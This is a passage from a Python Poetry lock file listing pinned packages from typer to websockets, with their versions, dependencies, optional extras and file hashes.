{file = "typer-0.9.0-py3-none-any.whl", hash = "sha256:5d96d986a21493606a358cae4461bd8cdf83cbf33a5aa950ae629ca3b51467ee"},
{file = "typer-0.9.0.tar.gz", hash = "sha256:50922fd79aea2f4751a8e0408ff10d2662bd0c8bbfa84755a699f3bada2978b2"},
]
[package.dependencies]
click = ">=7.1.1,<9.0.0"
typing-extensions = ">=3.7.4.3"
[package.extras]
all = ["colorama (>=0.4.3,<0.5.0)", "rich (>=10.11.0,<14.0.0)", "shellingham (>=1.3.0,<2.0.0)"]
dev = ["autoflake (>=1.3.1,<2.0.0)", "flake8 (>=3.8.3,<4.0.0)", "pre-commit (>=2.17.0,<3.0.0)"]
doc = ["cairosvg (>=2.5.2,<3.0.0)", "mdx-include (>=1.4.1,<2.0.0)", "mkdocs (>=1.1.2,<2.0.0)", "mkdocs-material (>=8.1.4,<9.0.0)", "pillow (>=9.3.0,<10.0.0)"]
test = ["black (>=22.3.0,<23.0.0)", "coverage (>=6.2,<7.0)", "isort (>=5.0.6,<6.0.0)", "mypy (==0.910)", "pytest (>=4.4.0,<8.0.0)", "pytest-cov (>=2.10.0,<5.0.0)", "pytest-sugar (>=0.9.4,<0.10.0)", "pytest-xdist (>=1.32.0,<4.0.0)", "rich (>=10.11.0,<14.0.0)", "shellingham (>=1.3.0,<2.0.0)"]
[[package]]
name = "types-chardet"
version = "5.0.4.6"
description = "Typing stubs for chardet"
optional = false
python-versions = "*"
files = [
{file = "types-chardet-5.0.4.6.tar.gz", hash = "sha256:caf4c74cd13ccfd8b3313c314aba943b159de562a2573ed03137402b2bb37818"},
{file = "types_chardet-5.0.4.6-py3-none-any.whl", hash = "sha256:ea832d87e798abf1e4dfc73767807c2b7fee35d0003ae90348aea4ae00fb004d"},
]
[[package]]
name = "types-protobuf"
version = "4.24.0.3"
description = "Typing stubs for protobuf"
optional = false
python-versions = ">=3.7"
files = [
{file = "types-protobuf-4.24.0.3.tar.gz", hash = "sha256:048ca006a08ac0563ff04a86ddcdda6f8877b024f5ff89ed6180510b017c3a91"},
{file = "types_protobuf-4.24.0.3-py3-none-any.whl", hash = "sha256:6652be32c647a855cd9c01e6c556ecdc94988188c4de89942ad13e906537aaee"},
]
[[package]]
name = "types-pyopenssl"
version = "23.2.0.2"
description = "Typing stubs for pyOpenSSL"
optional = false
python-versions = "*"
files = [
{file = "types-pyOpenSSL-23.2.0.2.tar.gz", hash = "sha256:6a010dac9ecd42b582d7dd2cc3e9e40486b79b3b64bb2fffba1474ff96af906d"},
{file = "types_pyOpenSSL-23.2.0.2-py3-none-any.whl", hash = "sha256:19536aa3debfbe25a918cf0d898e9f5fbbe6f3594a429da7914bf331deb1b342"},
]
[package.dependencies]
cryptography = ">=35.0.0"
[[package]]
name = "types-python-dateutil"
version = "2.8.19.14"
description = "Typing stubs for python-dateutil"
optional = false
python-versions = "*"
files = [
{file = "types-python-dateutil-2.8.19.14.tar.gz", hash = "sha256:1f4f10ac98bb8b16ade9dbee3518d9ace017821d94b057a425b069f834737f4b"},
{file = "types_python_dateutil-2.8.19.14-py3-none-any.whl", hash = "sha256:f977b8de27787639986b4e28963263fd0e5158942b3ecef91b9335c130cb1ce9"},
]
[[package]]
name = "types-pytz"
version = "2023.3.1.1"
description = "Typing stubs for pytz"
optional = false
python-versions = "*"
files = [
{file = "types-pytz-2023.3.1.1.tar.gz", hash = "sha256:cc23d0192cd49c8f6bba44ee0c81e4586a8f30204970fc0894d209a6b08dab9a"},
{file = "types_pytz-2023.3.1.1-py3-none-any.whl", hash = "sha256:1999a123a3dc0e39a2ef6d19f3f8584211de9e6a77fe7a0259f04a524e90a5cf"},
]
[[package]]
name = "types-pyyaml"
version = "6.0.12.12"
description = "Typing stubs for PyYAML"
optional = false
python-versions = "*"
files = [
{file = "types-PyYAML-6.0.12.12.tar.gz", hash = "sha256:334373d392fde0fdf95af5c3f1661885fa10c52167b14593eb856289e1855062"},
{file = "types_PyYAML-6.0.12.12-py3-none-any.whl", hash = "sha256:c05bc6c158facb0676674b7f11fe3960db4f389718e19e62bd2b84d6205cfd24"},
]
[[package]]
name = "types-redis"
version = "4.6.0.8"
description = "Typing stubs for redis"
optional = false
python-versions = ">=3.7"
files = [
{file = "types-redis-4.6.0.8.tar.gz", hash = "sha256:1abb2859bbf9b171a22ef69d1ece0e35ef93e642fba97538497add884ad75b5e"},
{file = "types_redis-4.6.0.8-py3-none-any.whl", hash = "sha256:4839923b4cce77bbf987290ca83710f8218529eebe1d2c3a0f067416c86847f5"},
]
[package.dependencies]
cryptography = ">=35.0.0"
types-pyOpenSSL = "*"
[[package]]
name = "types-requests"
version = "2.31.0.6"
description = "Typing stubs for requests"
optional = false
python-versions = ">=3.7"
files = [
{file = "types-requests-2.31.0.6.tar.gz", hash = "sha256:cd74ce3b53c461f1228a9b783929ac73a666658f223e28ed29753771477b3bd0"},
{file = "types_requests-2.31.0.6-py3-none-any.whl", hash = "sha256:a2db9cb228a81da8348b49ad6db3f5519452dd20a9c1e1a868c83c5fe88fd1a9"},
]
[package.dependencies]
types-urllib3 = "*"
[[package]]
name = "types-toml"
version = "0.10.8.7"
description = "Typing stubs for toml"
optional = false
python-versions = "*"
files = [
{file = "types-toml-0.10.8.7.tar.gz", hash = "sha256:58b0781c681e671ff0b5c0319309910689f4ab40e8a2431e205d70c94bb6efb1"},
{file = "types_toml-0.10.8.7-py3-none-any.whl", hash = "sha256:61951da6ad410794c97bec035d59376ce1cbf4453dc9b6f90477e81e4442d631"},
]
[[package]]
name = "types-urllib3"
version = "1.26.25.14"
description = "Typing stubs for urllib3"
optional = false
python-versions = "*"
files = [
{file = "types-urllib3-1.26.25.14.tar.gz", hash = "sha256:229b7f577c951b8c1b92c1bc2b2fdb0b49847bd2af6d1cc2a2e3dd340f3bda8f"},
{file = "types_urllib3-1.26.25.14-py3-none-any.whl", hash = "sha256:9683bbb7fb72e32bfe9d2be6e04875fbe1b3eeec3cbb4ea231435aa7fd6b4f0e"},
]
[[package]]
name = "typing-extensions"
version = "4.8.0"
description = "Backported and Experimental Type Hints for Python 3.8+"
optional = false
python-versions = ">=3.8"
files = [
{file = "typing_extensions-4.8.0-py3-none-any.whl", hash = "sha256:8f92fc8806f9a6b641eaa5318da32b44d401efaac0f6678c9bc448ba3605faa0"},
{file = "typing_extensions-4.8.0.tar.gz", hash = "sha256:df8e4339e9cb77357558cbdbceca33c303714cf861d1eef15e1070055ae8b7ef"},
]
[[package]]
name = "typing-inspect"
version = "0.9.0"
description = "Runtime inspection utilities for typing module."
optional = false
python-versions = "*"
files = [
{file = "typing_inspect-0.9.0-py3-none-any.whl", hash = "sha256:9ee6fc59062311ef8547596ab6b955e1b8aa46242d854bfc78f4f6b0eff35f9f"},
{file = "typing_inspect-0.9.0.tar.gz", hash = "sha256:b23fc42ff6f6ef6954e4852c1fb512cdd18dbea03134f91f856a95ccc9461f78"},
]
[package.dependencies]
mypy-extensions = ">=0.3.0"
typing-extensions = ">=3.7.4"
[[package]]
name = "tzdata"
version = "2023.3"
description = "Provider of IANA time zone data"
optional = false
python-versions = ">=2"
files = [
{file = "tzdata-2023.3-py2.py3-none-any.whl", hash = "sha256:7e65763eef3120314099b6939b5546db7adce1e7d6f2e179e3df563c70511eda"},
{file = "tzdata-2023.3.tar.gz", hash = "sha256:11ef1e08e54acb0d4f95bdb1be05da659673de4acbd21bf9c69e94cc5e907a3a"},
]
[[package]]
name = "tzlocal"
version = "4.3.1"
description = "tzinfo object for the local timezone"
optional = true
python-versions = ">=3.7"
files = [
{file = "tzlocal-4.3.1-py3-none-any.whl", hash = "sha256:67d7e7f4ce0a98e9dfde2e02474c60fe846ed032d78b555c554c2e9cba472d84"},
{file = "tzlocal-4.3.1.tar.gz", hash = "sha256:ee32ef8c20803c19a96ed366addd3d4a729ef6309cb5c7359a0cc2eeeb7fa46a"},
]
[package.dependencies]
"backports.zoneinfo" = {version = "*", markers = "python_version < \"3.9\""}
pytz-deprecation-shim = "*"
tzdata = {version = "*", markers = "platform_system == \"Windows\""}
[package.extras]
devenv = ["black", "check-manifest", "flake8", "pyroma", "pytest (>=4.3)", "pytest-cov", "pytest-mock (>=3.3)", "zest.releaser"]
[[package]]
name = "upstash-redis"
version = "0.15.0"
description = "Serverless Redis SDK from Upstash"
optional = true
python-versions = ">=3.8,<4.0"
files = [
{file = "upstash_redis-0.15.0-py3-none-any.whl", hash = "sha256:4a89913cb2bb2422610bc2a9c8d6b9a9d75d0674c22c5ea8037d35d343ee5846"},
{file = "upstash_redis-0.15.0.tar.gz", hash = "sha256:910f6a567142167b742c38efecfabf23f47e24fcbddb00a6b5845cb11064c3af"},
]
[package.dependencies]
aiohttp = ">=3.8.4,<4.0.0"
requests = ">=2.31.0,<3.0.0"
[[package]]
name = "uri-template"
version = "1.3.0"
description = "RFC 6570 URI Template Processor"
optional = false
python-versions = ">=3.7"
files = [
{file = "uri-template-1.3.0.tar.gz", hash = "sha256:0e00f8eb65e18c7de20d595a14336e9f337ead580c70934141624b6d1ffdacc7"},
{file = "uri_template-1.3.0-py3-none-any.whl", hash = "sha256:a44a133ea12d44a0c0f06d7d42a52d71282e77e2f937d8abd5655b8d56fc1363"},
]
[package.extras]
dev = ["flake8", "flake8-annotations", "flake8-bandit", "flake8-bugbear", "flake8-commas", "flake8-comprehensions", "flake8-continuation", "flake8-datetimez", "flake8-docstrings", "flake8-import-order", "flake8-literal", "flake8-modern-annotations", "flake8-noqa", "flake8-pyproject", "flake8-requirements", "flake8-typechecking-import", "flake8-use-fstring", "mypy", "pep8-naming", "types-PyYAML"]
[[package]]
name = "uritemplate"
version = "4.1.1"
description = "Implementation of RFC 6570 URI Templates"
optional = true
python-versions = ">=3.6"
files = [
{file = "uritemplate-4.1.1-py2.py3-none-any.whl", hash = "sha256:830c08b8d99bdd312ea4ead05994a38e8936266f84b9a7878232db50b044e02e"},
{file = "uritemplate-4.1.1.tar.gz", hash = "sha256:4346edfc5c3b79f694bccd6d6099a322bbeb628dbf2cd86eea55a456ce5124f0"},
]
[[package]]
name = "urllib3"
version = "1.26.18"
description = "HTTP library with thread-safe connection pooling, file post, and more."
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*"
files = [
{file = "urllib3-1.26.18-py2.py3-none-any.whl", hash = "sha256:34b97092d7e0a3a8cf7cd10e386f401b3737364026c45e622aa02903dffe0f07"},
{file = "urllib3-1.26.18.tar.gz", hash = "sha256:f8ecc1bba5667413457c529ab955bf8c67b45db799d159066261719e328580a0"},
]
[package.extras]
brotli = ["brotli (==1.0.9)", "brotli (>=1.0.9)", "brotlicffi (>=0.8.0)", "brotlipy (>=0.6.0)"]
secure = ["certifi", "cryptography (>=1.3.4)", "idna (>=2.0.0)", "ipaddress", "pyOpenSSL (>=0.14)", "urllib3-secure-extra"]
socks = ["PySocks (>=1.5.6,!=1.5.7,<2.0)"]
[[package]]
name = "validators"
version = "0.22.0"
description = "Python Data Validation for Humans™"
optional = true
python-versions = ">=3.8"
files = [
{file = "validators-0.22.0-py3-none-any.whl", hash = "sha256:61cf7d4a62bbae559f2e54aed3b000cea9ff3e2fdbe463f51179b92c58c9585a"},
{file = "validators-0.22.0.tar.gz", hash = "sha256:77b2689b172eeeb600d9605ab86194641670cdb73b60afd577142a9397873370"},
]
[package.extras]
docs-offline = ["myst-parser (>=2.0.0)", "pypandoc-binary (>=1.11)", "sphinx (>=7.1.1)"]
docs-online = ["mkdocs (>=1.5.2)", "mkdocs-git-revision-date-localized-plugin (>=1.2.0)", "mkdocs-material (>=9.2.6)", "mkdocstrings[python] (>=0.22.0)", "pyaml (>=23.7.0)"]
hooks = ["pre-commit (>=3.3.3)"]
package = ["build (>=1.0.0)", "twine (>=4.0.2)"]
runner = ["tox (>=4.11.1)"]
sast = ["bandit[toml] (>=1.7.5)"]
testing = ["pytest (>=7.4.0)"]
tooling = ["black (>=23.7.0)", "pyright (>=1.1.325)", "ruff (>=0.0.287)"]
tooling-extras = ["pyaml (>=23.7.0)", "pypandoc-binary (>=1.11)", "pytest (>=7.4.0)"]
[[package]]
name = "vcrpy"
version = "5.1.0"
description = "Automatically mock your HTTP interactions to simplify and speed up testing"
optional = false
python-versions = ">=3.8"
files = [
{file = "vcrpy-5.1.0-py2.py3-none-any.whl", hash = "sha256:605e7b7a63dcd940db1df3ab2697ca7faf0e835c0852882142bafb19649d599e"},
{file = "vcrpy-5.1.0.tar.gz", hash = "sha256:bbf1532f2618a04f11bce2a99af3a9647a32c880957293ff91e0a5f187b6b3d2"},
]
[package.dependencies]
PyYAML = "*"
urllib3 = {version = "<2", markers = "python_version < \"3.10\""}
wrapt = "*"
yarl = "*"
[[package]]
name = "watchdog"
version = "3.0.0"
description = "Filesystem events monitoring"
optional = false
python-versions = ">=3.7"
files = [
{file = "watchdog-3.0.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:336adfc6f5cc4e037d52db31194f7581ff744b67382eb6021c868322e32eef41"},
{file = "watchdog-3.0.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:a70a8dcde91be523c35b2bf96196edc5730edb347e374c7de7cd20c43ed95397"},
{file = "watchdog-3.0.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:adfdeab2da79ea2f76f87eb42a3ab1966a5313e5a69a0213a3cc06ef692b0e96"},
{file = "watchdog-3.0.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:2b57a1e730af3156d13b7fdddfc23dea6487fceca29fc75c5a868beed29177ae"},
{file = "watchdog-3.0.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:7ade88d0d778b1b222adebcc0927428f883db07017618a5e684fd03b83342bd9"},
{file = "watchdog-3.0.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:7e447d172af52ad204d19982739aa2346245cc5ba6f579d16dac4bfec226d2e7"},
{file = "watchdog-3.0.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:9fac43a7466eb73e64a9940ac9ed6369baa39b3bf221ae23493a9ec4d0022674"},
{file = "watchdog-3.0.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:8ae9cda41fa114e28faf86cb137d751a17ffd0316d1c34ccf2235e8a84365c7f"},
{file = "watchdog-3.0.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:25f70b4aa53bd743729c7475d7ec41093a580528b100e9a8c5b5efe8899592fc"},
{file = "watchdog-3.0.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:4f94069eb16657d2c6faada4624c39464f65c05606af50bb7902e036e3219be3"},
{file = "watchdog-3.0.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:7c5f84b5194c24dd573fa6472685b2a27cc5a17fe5f7b6fd40345378ca6812e3"},
{file = "watchdog-3.0.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:3aa7f6a12e831ddfe78cdd4f8996af9cf334fd6346531b16cec61c3b3c0d8da0"},
{file = "watchdog-3.0.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:233b5817932685d39a7896b1090353fc8efc1ef99c9c054e46c8002561252fb8"},
{file = "watchdog-3.0.0-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:13bbbb462ee42ec3c5723e1205be8ced776f05b100e4737518c67c8325cf6100"},
{file = "watchdog-3.0.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:8f3ceecd20d71067c7fd4c9e832d4e22584318983cabc013dbf3f70ea95de346"},
{file = "watchdog-3.0.0-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:c9d8c8ec7efb887333cf71e328e39cffbf771d8f8f95d308ea4125bf5f90ba64"},
{file = "watchdog-3.0.0-py3-none-manylinux2014_aarch64.whl", hash = "sha256:0e06ab8858a76e1219e68c7573dfeba9dd1c0219476c5a44d5333b01d7e1743a"},
{file = "watchdog-3.0.0-py3-none-manylinux2014_armv7l.whl", hash = "sha256:d00e6be486affb5781468457b21a6cbe848c33ef43f9ea4a73b4882e5f188a44"},
{file = "watchdog-3.0.0-py3-none-manylinux2014_i686.whl", hash = "sha256:c07253088265c363d1ddf4b3cdb808d59a0468ecd017770ed716991620b8f77a"},
{file = "watchdog-3.0.0-py3-none-manylinux2014_ppc64.whl", hash = "sha256:5113334cf8cf0ac8cd45e1f8309a603291b614191c9add34d33075727a967709"},
{file = "watchdog-3.0.0-py3-none-manylinux2014_ppc64le.whl", hash = "sha256:51f90f73b4697bac9c9a78394c3acbbd331ccd3655c11be1a15ae6fe289a8c83"},
{file = "watchdog-3.0.0-py3-none-manylinux2014_s390x.whl", hash = "sha256:ba07e92756c97e3aca0912b5cbc4e5ad802f4557212788e72a72a47ff376950d"},
{file = "watchdog-3.0.0-py3-none-manylinux2014_x86_64.whl", hash = "sha256:d429c2430c93b7903914e4db9a966c7f2b068dd2ebdd2fa9b9ce094c7d459f33"},
{file = "watchdog-3.0.0-py3-none-win32.whl", hash = "sha256:3ed7c71a9dccfe838c2f0b6314ed0d9b22e77d268c67e015450a29036a81f60f"},
{file = "watchdog-3.0.0-py3-none-win_amd64.whl", hash = "sha256:4c9956d27be0bb08fc5f30d9d0179a855436e655f046d288e2bcc11adfae893c"},
{file = "watchdog-3.0.0-py3-none-win_ia64.whl", hash = "sha256:5d9f3a10e02d7371cd929b5d8f11e87d4bad890212ed3901f9b4d68767bee759"},
{file = "watchdog-3.0.0.tar.gz", hash = "sha256:4d98a320595da7a7c5a18fc48cb633c2e73cda78f93cac2ef42d42bf609a33f9"},
]
[package.extras]
watchmedo = ["PyYAML (>=3.10)"]
[[package]]
name = "wcwidth"
version = "0.2.8"
description = "Measures the displayed width of unicode strings in a terminal"
optional = false
python-versions = "*"
files = [
{file = "wcwidth-0.2.8-py2.py3-none-any.whl", hash = "sha256:77f719e01648ed600dfa5402c347481c0992263b81a027344f3e1ba25493a704"},
{file = "wcwidth-0.2.8.tar.gz", hash = "sha256:8705c569999ffbb4f6a87c6d1b80f324bd6db952f5eb0b95bc07517f4c1813d4"},
]
[[package]]
name = "weaviate-client"
version = "3.25.1"
description = "A python native Weaviate client"
optional = true
python-versions = ">=3.8"
files = [
{file = "weaviate-client-3.25.1.tar.gz", hash = "sha256:cfa6435e365bae734d875013124baa14cada7e36af4f2d82def5a15b44374978"},
{file = "weaviate_client-3.25.1-py3-none-any.whl", hash = "sha256:94680aff46c3ad2748a7c6530c6466c6aee6d03b5b69c0c814f987f2fdefae36"},
]
[package.dependencies]
authlib = ">=1.2.1,<2.0.0"
requests = ">=2.30.0,<3.0.0"
validators = ">=0.21.2,<1.0.0"
[package.extras]
grpc = ["grpcio (>=1.57.0,<2.0.0)", "grpcio-tools (>=1.57.0,<2.0.0)"]
[[package]]
name = "webcolors"
version = "1.13"
description = "A library for working with the color formats defined by HTML and CSS."
optional = false
python-versions = ">=3.7"
files = [
{file = "webcolors-1.13-py3-none-any.whl", hash = "sha256:29bc7e8752c0a1bd4a1f03c14d6e6a72e93d82193738fa860cbff59d0fcc11bf"},
{file = "webcolors-1.13.tar.gz", hash = "sha256:c225b674c83fa923be93d235330ce0300373d02885cef23238813b0d5668304a"},
]
[package.extras]
docs = ["furo", "sphinx", "sphinx-copybutton", "sphinx-inline-tabs", "sphinx-notfound-page", "sphinxext-opengraph"]
tests = ["pytest", "pytest-cov"]
[[package]]
name = "webencodings"
version = "0.5.1"
description = "Character encoding aliases for legacy web content"
optional = false
python-versions = "*"
files = [
{file = "webencodings-0.5.1-py2.py3-none-any.whl", hash = "sha256:a0af1213f3c2226497a97e2b3aa01a7e4bee4f403f95be16fc9acd2947514a78"},
{file = "webencodings-0.5.1.tar.gz", hash = "sha256:b36a1c245f2d304965eb4e0a82848379241dc04b865afcc4aab16748587e1923"},
]
[[package]]
name = "websocket-client"
version = "1.6.4"
description = "WebSocket client for Python with low level API options"
optional = false
python-versions = ">=3.8"
files = [
{file = "websocket-client-1.6.4.tar.gz", hash = "sha256:b3324019b3c28572086c4a319f91d1dcd44e6e11cd340232978c684a7650d0df"},
{file = "websocket_client-1.6.4-py3-none-any.whl", hash = "sha256:084072e0a7f5f347ef2ac3d8698a5e0b4ffbfcab607628cadabc650fc9a83a24"},
]
[package.extras]
docs = ["Sphinx (>=6.0)", "sphinx-rtd-theme (>=1.1.0)"]
optional = ["python-socks", "wsaccel"]
test = ["websockets"]
[[package]]
name = "websockets"
version = "12.0"
description = "An implementation of the WebSocket Protocol (RFC 6455 & 7692)"
optional = true
python-versions = ">=3.8"
files = [
{file = "websockets-12.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:d554236b2a2006e0ce16315c16eaa0d628dab009c33b63ea03f41c6107958374"},
{file = "websockets-12.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:2d225bb6886591b1746b17c0573e29804619c8f755b5598d875bb4235ea639be"},
{file = "websockets-12.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:eb809e816916a3b210bed3c82fb88eaf16e8afcf9c115ebb2bacede1797d2547"},
{file = "websockets-12.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c588f6abc13f78a67044c6b1273a99e1cf31038ad51815b3b016ce699f0d75c2"},
{file = "websockets-12.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5aa9348186d79a5f232115ed3fa9020eab66d6c3437d72f9d2c8ac0c6858c558"},
{file = "websockets-12.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6350b14a40c95ddd53e775dbdbbbc59b124a5c8ecd6fbb09c2e52029f7a9f480"},
{file = "websockets-12.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:70ec754cc2a769bcd218ed8d7209055667b30860ffecb8633a834dde27d6307c"},
{file = "websockets-12.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:6e96f5ed1b83a8ddb07909b45bd94833b0710f738115751cdaa9da1fb0cb66e8"},
{file = "websockets-12.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:4d87be612cbef86f994178d5186add3d94e9f31cc3cb499a0482b866ec477603"},
{file = "websockets-12.0-cp310-cp310-win32.whl", hash = "sha256:befe90632d66caaf72e8b2ed4d7f02b348913813c8b0a32fae1cc5fe3730902f"},
{file = "websockets-12.0-cp310-cp310-win_amd64.whl", hash = "sha256:363f57ca8bc8576195d0540c648aa58ac18cf85b76ad5202b9f976918f4219cf"},
{file = "websockets-12.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:5d873c7de42dea355d73f170be0f23788cf3fa9f7bed718fd2830eefedce01b4"},
{file = "websockets-12.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:3f61726cae9f65b872502ff3c1496abc93ffbe31b278455c418492016e2afc8f"},
{file = "websockets-12.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:ed2fcf7a07334c77fc8a230755c2209223a7cc44fc27597729b8ef5425aa61a3"},
{file = "websockets-12.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8e332c210b14b57904869ca9f9bf4ca32f5427a03eeb625da9b616c85a3a506c"},
{file = "websockets-12.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5693ef74233122f8ebab026817b1b37fe25c411ecfca084b29bc7d6efc548f45"},
{file = "websockets-12.0-cp311-cp311-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6e9e7db18b4539a29cc5ad8c8b252738a30e2b13f033c2d6e9d0549b45841c04"},
{file = "websockets-12.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:6e2df67b8014767d0f785baa98393725739287684b9f8d8a1001eb2839031447"},
{file = "websockets-12.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:bea88d71630c5900690fcb03161ab18f8f244805c59e2e0dc4ffadae0a7ee0ca"},
{file = "websockets-12.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:dff6cdf35e31d1315790149fee351f9e52978130cef6c87c4b6c9b3baf78bc53"},
{file = "websockets-12.0-cp311-cp311-win32.whl", hash = "sha256:3e3aa8c468af01d70332a382350ee95f6986db479ce7af14d5e81ec52aa2b402"},
{file = "websockets-12.0-cp311-cp311-win_amd64.whl", hash = "sha256:25eb766c8ad27da0f79420b2af4b85d29914ba0edf69f547cc4f06ca6f1d403b"},
{file = "websockets-12.0-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:0e6e2711d5a8e6e482cacb927a49a3d432345dfe7dea8ace7b5790df5932e4df"},
{file = "websockets-12.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:dbcf72a37f0b3316e993e13ecf32f10c0e1259c28ffd0a85cee26e8549595fbc"},
{file = "websockets-12.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:12743ab88ab2af1d17dd4acb4645677cb7063ef4db93abffbf164218a5d54c6b"},
{file = "websockets-12.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:7b645f491f3c48d3f8a00d1fce07445fab7347fec54a3e65f0725d730d5b99cb"},
{file = "websockets-12.0-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:9893d1aa45a7f8b3bc4510f6ccf8db8c3b62120917af15e3de247f0780294b92"},
{file = "websockets-12.0-cp312-cp312-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1f38a7b376117ef7aff996e737583172bdf535932c9ca021746573bce40165ed"},
{file = "websockets-12.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:f764ba54e33daf20e167915edc443b6f88956f37fb606449b4a5b10ba42235a5"},
{file = "websockets-12.0-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:1e4b3f8ea6a9cfa8be8484c9221ec0257508e3a1ec43c36acdefb2a9c3b00aa2"},
{file = "websockets-12.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:9fdf06fd06c32205a07e47328ab49c40fc1407cdec801d698a7c41167ea45113"},
{file = "websockets-12.0-cp312-cp312-win32.whl", hash = "sha256:baa386875b70cbd81798fa9f71be689c1bf484f65fd6fb08d051a0ee4e79924d"},
{file = "websockets-12.0-cp312-cp312-win_amd64.whl", hash = "sha256:ae0a5da8f35a5be197f328d4727dbcfafa53d1824fac3d96cdd3a642fe09394f"},
{file = "websockets-12.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:5f6ffe2c6598f7f7207eef9a1228b6f5c818f9f4d53ee920aacd35cec8110438"},
{file = "websockets-12.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:9edf3fc590cc2ec20dc9d7a45108b5bbaf21c0d89f9fd3fd1685e223771dc0b2"},
{file = "websockets-12.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:8572132c7be52632201a35f5e08348137f658e5ffd21f51f94572ca6c05ea81d"},
{file = "websockets-12.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:604428d1b87edbf02b233e2c207d7d528460fa978f9e391bd8aaf9c8311de137"},
{file = "websockets-12.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:1a9d160fd080c6285e202327aba140fc9a0d910b09e423afff4ae5cbbf1c7205"},
{file = "websockets-12.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:87b4aafed34653e465eb77b7c93ef058516cb5acf3eb21e42f33928616172def"},
{file = "websockets-12.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:b2ee7288b85959797970114deae81ab41b731f19ebcd3bd499ae9ca0e3f1d2c8"},
{file = "websockets-12.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:7fa3d25e81bfe6a89718e9791128398a50dec6d57faf23770787ff441d851967"},
{file = "websockets-12.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:a571f035a47212288e3b3519944f6bf4ac7bc7553243e41eac50dd48552b6df7"},
{file = "websockets-12.0-cp38-cp38-win32.whl", hash = "sha256:3c6cc1360c10c17463aadd29dd3af332d4a1adaa8796f6b0e9f9df1fdb0bad62"},
{file = "websockets-12.0-cp38-cp38-win_amd64.whl", hash = "sha256:1bf386089178ea69d720f8db6199a0504a406209a0fc23e603b27b300fdd6892"},
{file = "websockets-12.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:ab3d732ad50a4fbd04a4490ef08acd0517b6ae6b77eb967251f4c263011a990d"},
{file = "websockets-12.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:a1d9697f3337a89691e3bd8dc56dea45a6f6d975f92e7d5f773bc715c15dde28"},
{file = "websockets-12.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:1df2fbd2c8a98d38a66f5238484405b8d1d16f929bb7a33ed73e4801222a6f53"},
{file = "websockets-12.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:23509452b3bc38e3a057382c2e941d5ac2e01e251acce7adc74011d7d8de434c"},
